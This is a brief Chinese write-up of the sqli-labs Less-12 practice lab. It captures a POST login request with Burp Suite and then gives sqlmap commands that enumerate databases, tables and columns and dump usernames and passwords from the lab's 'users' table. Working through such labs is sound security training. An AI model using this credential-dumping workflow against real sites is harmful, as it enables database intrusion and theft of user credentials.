1.由于该题是post注入,所以我们在用户名密码处随意输入并使用bp进行抓包存储文件。
使用sqlmap对sqli-less-12 的题解
2.查询注入点

sqlmap.py -r 1.txt

使用sqlmap对sqli-less-12 的题解

3.查询数据库

sqlmap.py -r 1.txt –dbs

使用sqlmap对sqli-less-12 的题解
4.查询表

sqlmap.py -r 1.txt -D security –tables

使用sqlmap对sqli-less-12 的题解
5.查询列

sqlmap.py -r 1.txt -D security -T users –columns

使用sqlmap对sqli-less-12 的题解
6.查询字段中得值

sqlmap.py -r 1.txt -D security -T users -C username,password –dump

使用sqlmap对sqli-less-12 的题解

相关文章:

  • 2021-06-26
  • 2021-06-20
  • 2021-07-20
  • 2022-01-04
  • 2021-06-08
  • 2022-12-23
  • 2022-12-23
  • 2021-07-17
猜你喜欢
  • 2021-05-29
  • 2021-09-24
  • 2021-12-29
  • 2021-06-29
  • 2021-12-09
  • 2021-07-14
  • 2021-10-22
相关资源
相似解决方案